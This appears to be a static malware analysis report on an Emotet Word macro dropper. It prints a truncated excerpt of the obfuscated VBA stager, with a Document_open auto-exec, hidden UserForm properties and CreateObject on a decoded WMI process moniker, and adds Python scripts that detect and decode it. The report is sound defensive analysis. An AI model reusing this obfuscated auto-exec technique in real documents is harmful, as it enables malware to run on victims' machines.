Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 5617c4abba5374ab…

MALICIOUS

Office (OLE)

Size: 171.8 KB
Created: 2020-08-18 06:39:00
Authoring application: Microsoft Office Word
First seen: 2020-09-07
MD5: 306acea16547aa69c4375ba0c4fb18b9
SHA-1: 24923fb896724bfe93154d34aef72b55631119ea
SHA-256: 5617c4abba5374abe1882c0e5903f2c0c83a8ddbed90d1cbf65ab00a08b8946c
Risk score: 262

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

ClamAV detected the sample with the signature 'Doc.Downloader.Emotet-9372916-0'. Static analysis recovered VBA macros with a Document_Open auto-exec entry point and a hidden-property command stager: the macro derives a ProgID from an obfuscated string literal and UserForm properties (HelpContextId, ControlTipText) and passes the result to CreateObject. This is the shape of a macro downloader that fetches and executes a second-stage payload, the distribution technique characteristic of Emotet. Because the analysis is static, the download-and-execute behaviour is inferred from the macro structure rather than observed; the family attribution rests on the ClamAV signature together with that structure.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-9372916-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-9372916-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open runs automatically when the document is opened with macros enabled and is the execution trigger for the rest of the chain. In this sample it is written as "Private Sub _" / "Document_open()", a VBA line continuation that splits the procedure name across two lines.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject instantiates a COM object from a ProgID string. Here the argument is a variable (Sw0h6fdcc39nndue1) produced by a decoding function rather than a string literal, so the object type is hidden from a plain string scan.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the DrawingML XML namespace that Office writes into embedded drawing parts, not a download location, and it should not be treated as an indicator.
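The heuristic set above can be reproduced on the extracted source with a small triage script. The following is an added example for this report, not the analyser's own detection code: it looks for the three legs of the OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER shape (an auto-exec entry point, CreateObject() called on a variable instead of a string literal, and reads of UserForm properties such as ControlTipText or HelpContextId) in decoded VBA, and it folds VBA " _" line continuations first, because this sample splits "Private Sub _" and "Document_open()" across two lines and a single-line match would miss the entry point. The sample input is an excerpt of the macros.bas preview below with the filler loops removed; the regexes and the scoring rule are this example's own.

```python
"""Triage an olevba-extracted VBA module for the hidden-property command-stager shape.

Added example for this report, not the analyser's own detection code. Plain
regex over decoded source; compiled p-code is out of scope.
"""
import re

AUTOEXEC_NAMES = {"document_open", "autoopen", "auto_open", "workbook_open",
                  "autoexec", "document_close", "autoclose"}
HIDDEN_PROPS = {"controltiptext": "ControlTipText", "tag": "Tag",
                "pages": "Pages", "helpcontextid": "HelpContextId"}

# VBA continues a statement onto the next line with a trailing " _"; the sample
# splits "Private Sub _" / "Document_open()" this way, which defeats a
# single-line match for the auto-exec name unless the continuation is folded.
_CONTINUATION = re.compile(r"[ \t]_[ \t]*\r?\n[ \t]*")
_PROC = re.compile(
    r"^\s*(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)",
    re.I | re.M)
_CREATEOBJ = re.compile(r"\bCreateObject\s*\(\s*([^)]*?)\s*\)", re.I)
_HIDDEN = re.compile(r"\.(" + "|".join(HIDDEN_PROPS.values()) + r")\b", re.I)
_STRING_OPS = re.compile(r"\b(Split|Join|ChrW?|StrReverse|Replace)\s*\(", re.I)


def join_continuations(src: str) -> str:
    """Fold ' _' line continuations so 'Sub _\\nDocument_open()' becomes one line."""
    return _CONTINUATION.sub(" ", src)


def triage(src: str) -> dict:
    """Return the indicators found in one VBA module and the combined verdict."""
    src = join_continuations(src)
    procs = _PROC.findall(src)
    autoexec = [p for p in procs if p.lower() in AUTOEXEC_NAMES]
    createobj_args = _CREATEOBJ.findall(src)
    # A literal ProgID looks like "Wscript.Shell"; anything else is built at runtime.
    dynamic_args = [a for a in createobj_args if not a.startswith('"')]
    hidden = sorted({HIDDEN_PROPS[m.group(1).lower()] for m in _HIDDEN.finditer(src)})
    string_ops = sorted({m.group(1) for m in _STRING_OPS.finditer(src)}, key=str.lower)
    return {
        "autoexec": autoexec,
        "dynamic_createobject_args": dynamic_args,
        "hidden_properties": hidden,
        "string_ops": string_ops,
        # All three legs are required; any one alone is common in benign macros.
        "stager_shape": bool(autoexec) and bool(dynamic_args) and bool(hidden),
    }


# Excerpt of the macros.bas preview shown on this page (filler loops and
# arithmetic removed); used here as the sample input.
SAMPLE = '''Attribute VB_Name = "Fyzym75b7hm45qgn3p"
Private Sub _
Document_open()
Tg9idz07p_m943cbc5.V4ylinm9q5se6_egfl
End Sub

Attribute VB_Name = "Tg9idz07p_m943cbc5"
Function V4ylinm9q5se6_egfl()
Q0grkhwe_4gp0 = Tg9idz07p_m943cbc5.HelpContextId + 50 + 50
Pyph_8o39snn3fd5g = ChrW(Q0grkhwe_4gp0 + (15))
Sw0h6fdcc39nndue1 = Z5p8dqcf__ch2ea(Qar2m3o6egp1vg)
Set Twzjjs4meynum6y9e0 = CreateObject(Sw0h6fdcc39nndue1)
Jk7huwo7o8_g = Tg9idz07p_m943cbc5.Fmdzi4k13l3ywt.ControlTipText
End Function
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

On the excerpt this reports the Document_open entry point, one CreateObject call on a variable, the HelpContextId and ControlTipText reads, and the ChrW call, so the combined shape fires; a macro that opens Word with a literal ProgID has an auto-exec entry but no dynamic ProgID and no hidden-property reads, so it does not. Source-based checks like this only work when olevba can decompress the source stream; the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic exists for the case where it cannot.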

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                                Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)   11534 bytes
SHA-256: 9d1a3355898b992a4c35c27b0382f9602f63e0036685c33f5b8878a33e588bac

Preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "Fyzym75b7hm45qgn3p"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Tg9idz07p_m943cbc5.V4ylinm9q5se6_egfl
End Sub


Attribute VB_Name = "Tg9idz07p_m943cbc5"
Attribute VB_Base = "0{E258942A-B2FC-4483-84AB-5DDF46D8232E}{270320ED-3906-4308-8B6B-5E90EA795001}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function V4ylinm9q5se6_egfl()
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 731
C89eiix8mtjkpv = 676
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
Nv6d6ahhj55 = Tgd8lkm7mimlkiers_
Q0grkhwe_4gp0 = Tg9idz07p_m943cbc5.HelpContextId + 50 + 50
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 115
C89eiix8mtjkpv = 959
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
Kd3vdoyw5on4_u = Tgd8lkm7mimlkiers_
Pyph_8o39snn3fd5g = ChrW(Q0grkhwe_4gp0 + (15))
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 351
C89eiix8mtjkpv = 456
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
Ye5wt47_wyx4 = Tgd8lkm7mimlkiers_
Qar2m3o6egp1vg = "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggi58[sn ]]][ jsa 21u7gsgggnm58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggggm58[sn ]]][ jsa 21u7gsgggt58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg" + Pyph_8o39snn3fd5g + "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg:58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggin58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg358[sn ]]][ jsa 21u7gsggg258[sn ]]][ jsa 21u7gsggg_58[sn ]]][ jsa 21u7gsggg" + Tg9idz07p_m943cbc5.Wobcvj180_d6l7qkb + "58[sn ]]][ jsa 21u7gsgggro58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggce58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsggg"
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 649
C89eiix8mtjkpv = 263
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
Pt4cbeq58ere6 = Tgd8lkm7mimlkiers_
Sw0h6fdcc39nndue1 = Z5p8dqcf__ch2ea(Qar2m3o6egp1vg)
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 11
C89eiix8mtjkpv = 12
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
C_f56d7xekn65l1he = Tgd8lkm7mimlkiers_
Set Twzjjs4meynum6y9e0 = CreateObject(Sw0h6fdcc39nndue1)
   For Zq42052z0scn5 = 5 To 62
DoEvents
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Debug.Print (CStr(Wvliztgbgd50mz) & CStr(Snz98cjvuopcar1of7))
Next Zq42052z0scn5
Tgd8lkm7mimlkiers_ = 13
C89eiix8mtjkpv = 165
Tgd8lkm7mimlkiers_ = Tgd8lkm7mimlkiers_ + C89eiix8mtjkpv
Licrkr7395shpp = Tgd8lkm7mimlkiers_
Jk7huwo7o8_g = Tg9idz07p_m943cbc5.Fmdzi4k13l3ywt.ControlTipText
   For Zq420
... (truncated)
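The string assigned to Qar2m3o6egp1vg above is the command text the heuristic refers to: real characters separated by the junk run "58[sn ]]][ jsa 21u7gsggg", which the (truncated) decoding function is expected to strip with Split/Join before the result reaches CreateObject. The following is an added worked decode for this report, not code from the sample or the analyser. Two characters are resolved at run time from the UserForm and are absent from macros.bas, so they are assumptions here and are labelled as such in the code: Pyph_8o39snn3fd5g is ChrW(HelpContextId + 50 + 50 + 15), and a UserForm's HelpContextId defaults to 0, which would give ChrW(115) = "s"; Tg9idz07p_m943cbc5.Wobcvj180_d6l7qkb is a hidden form property whose value is not in the extracted source, and "P" is assumed so that the worked result is well formed. The three string literals are copied verbatim from the preview.

```python
"""Reconstruct the ProgID the macro above hands to CreateObject.

Added example for this report, not code from the sample or the analyser. It
applies the Split/Join the heuristic describes to the literal assigned to
Qar2m3o6egp1vg. Two characters come from the UserForm at run time and are
ASSUMED here: HelpContextId = 0 (the UserForm default, giving ChrW(115) = "s")
and the hidden property Wobcvj180_d6l7qkb = "P".
"""

# The junk run that separates the real characters; every occurrence is dropped.
JUNK = "58[sn ]]][ jsa 21u7gsggg"

# The three string literals from the Qar2m3o6egp1vg assignment, verbatim,
# broken at junk boundaries so each line carries one junk run plus payload.
PART1 = ("58[sn ]]][ jsa 21u7gsggg"
         "58[sn ]]][ jsa 21u7gsgggw"
         "58[sn ]]][ jsa 21u7gsgggi"
         "58[sn ]]][ jsa 21u7gsgggnm"
         "58[sn ]]][ jsa 21u7gsggg"
         "58[sn ]]][ jsa 21u7gsggggm"
         "58[sn ]]][ jsa 21u7gsgggt"
         "58[sn ]]][ jsa 21u7gsggg"
         "58[sn ]]][ jsa 21u7gsggg")
PART2 = ("58[sn ]]][ jsa 21u7gsggg"
         "58[sn ]]][ jsa 21u7gsggg:"
         "58[sn ]]][ jsa 21u7gsgggw"
         "58[sn ]]][ jsa 21u7gsgggin"
         "58[sn ]]][ jsa 21u7gsggg"
         "58[sn ]]][ jsa 21u7gsggg3"
         "58[sn ]]][ jsa 21u7gsggg2"
         "58[sn ]]][ jsa 21u7gsggg_"
         "58[sn ]]][ jsa 21u7gsggg")
PART3 = ("58[sn ]]][ jsa 21u7gsgggro"
         "58[sn ]]][ jsa 21u7gsggg"
         "58[sn ]]][ jsa 21u7gsgggce"
         "58[sn ]]][ jsa 21u7gsgggs"
         "58[sn ]]][ jsa 21u7gsgggs"
         "58[sn ]]][ jsa 21u7gsggg")


def vba_chrw_from_help_context(help_context_id: int) -> str:
    """Mirror of: Q0grkhwe_4gp0 = HelpContextId + 50 + 50 ; ChrW(Q0grkhwe_4gp0 + 15)."""
    return chr(help_context_id + 50 + 50 + 15)


def split_join(obfuscated: str, junk: str = JUNK) -> str:
    """Equivalent of VBA Join(Split(s, junk), ""): drop every junk run, keep the rest."""
    return "".join(obfuscated.split(junk))


def skeleton(placeholder: str = "?") -> str:
    """What macros.bas alone yields, with the two run-time characters masked."""
    return split_join(PART1 + placeholder + PART2 + placeholder + PART3)


def reassemble(help_context_id: int = 0, form_property: str = "P") -> str:
    """Rebuild Qar2m3o6egp1vg as the macro does, then decode it.

    help_context_id=0 and form_property="P" are ASSUMPTIONS, not values read
    from the sample's UserForm storage.
    """
    runtime_char = vba_chrw_from_help_context(help_context_id)
    return split_join(PART1 + runtime_char + PART2 + form_property + PART3)


if __name__ == "__main__":
    print("from source alone:", skeleton())
    print("with assumed form values:", reassemble())
```

From the source alone the decode yields "winmgmt?:win32_?rocess", which already fixes the shape of the ProgID. Under the two assumptions it becomes "winmgmts:win32_Process", the WMI moniker for the Win32_Process class, whose Create method spawns a process; that would make the CreateObject call a process-launch primitive rather than a download object, consistent with the loader shape the heuristic describes. The assumed characters should be confirmed by reading the UserForm's control properties from the form storage before the decoded value is used as an indicator.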